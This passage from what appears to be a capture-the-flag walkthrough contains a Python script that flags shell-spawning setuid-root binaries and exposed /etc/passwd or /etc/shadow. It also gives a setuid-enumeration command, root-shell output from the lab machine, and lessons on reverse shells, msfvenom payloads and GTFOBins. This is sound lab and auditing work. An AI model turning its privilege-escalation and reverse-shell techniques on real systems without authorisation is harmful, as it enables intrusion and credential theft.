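    if len(fields) != 9 or len(fields[0]) < 10:
        return None
    return fields[0], fields[2], fields[3], fields[8]


def audit_line(line: str) -> list[tuple[str, str]]:
    """Return (severity, message) findings for a single listing line."""
    parsed = parse_ls_line(line)
    if parsed is None:
        return []
    mode, owner, group, path = parsed
    name = os.path.basename(path)
    setuid = mode[3] in "sS"          # 's' = setuid + exec, 'S' = setuid without exec
    setgid = mode[6] in "sS"
    world_readable = mode[7] == "r"
    world_writable = mode[8] == "w"

    findings = []
    if setuid and owner == "root":
        if name in SHELL_SPAWNERS:
            findings.append(("critical", f"{path}: setuid-root and known to spawn a shell (GTFOBins)"))
        else:
            findings.append(("review", f"{path}: setuid-root, confirm it is expected"))
    elif setuid:
        # Like /usr/bin/at on this box: only useful if you are not already that account.
        findings.append(("info", f"{path}: setuid but owned by {owner}, no gain beyond that account"))
    if setgid and group == "root":
        findings.append(("review", f"{path}: setgid-root"))
    if path == "/etc/passwd" and world_writable:
        findings.append(("critical", "/etc/passwd is world-writable"))
    if path == "/etc/shadow" and world_readable:
        findings.append(("critical", "/etc/shadow is world-readable"))
    return findings


def audit_listing(text: str) -> list[tuple[str, str]]:
    """Audit every line of an `ls -la` listing."""
    return [f for line in text.splitlines() for f in audit_line(line)]


if __name__ == "__main__":
    for severity, message in audit_listing(SAMPLE_LISTING):
        print(f"[{severity}] {message}")
```

On a live system the input would come from something like `find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null` plus `ls -la /etc/passwd /etc/shadow`; the point of the severity split is that a setuid-root binary is only a finding worth acting on when it can hand out a shell or when its owner is not the account you already hold.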
This is GG!! Time for our beloved screenshot confirmation.
sh-3.2# cat /root/root.txt
----------------------------
sh-3.2# ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:b9:19:5f
inet addr:10.10.10.3 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feb9:195f/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:195f/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1218 errors:0 dropped:0 overruns:0 frame:0
TX packets:729 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:261868 (255.7 KB) TX bytes:281052 (274.4 KB)
Interrupt:19 Base address:0x2024
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:391 errors:0 dropped:0 overruns:0 frame:0
TX packets:391 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:165697 (161.8 KB) TX bytes:165697 (161.8 KB)
What did I learn?
- We learned why some backdoors might not come back to us: firewalls block them. The same goes for our reverse shells. If a shell doesn't pick up after a couple of tries, start testing other ports, usually the ones that are already exposed.
- A very fast way to get root is check the program versions and look for exploits, the internet is filled with PoCs to exploit vulnerable software.
- We learned how to modify scripts by creating our own payloads with msfvenom. There is a lot more to explore with msfvenom, but due to the length of the walkthrough I kept it short. Check these two references for more information on how to create your own payloads for different situations: https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/ and https://netsec.ws/?p=331
- We learned about GTFOBins and how it can help you quickly exploit SUIDs.
Stream
I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.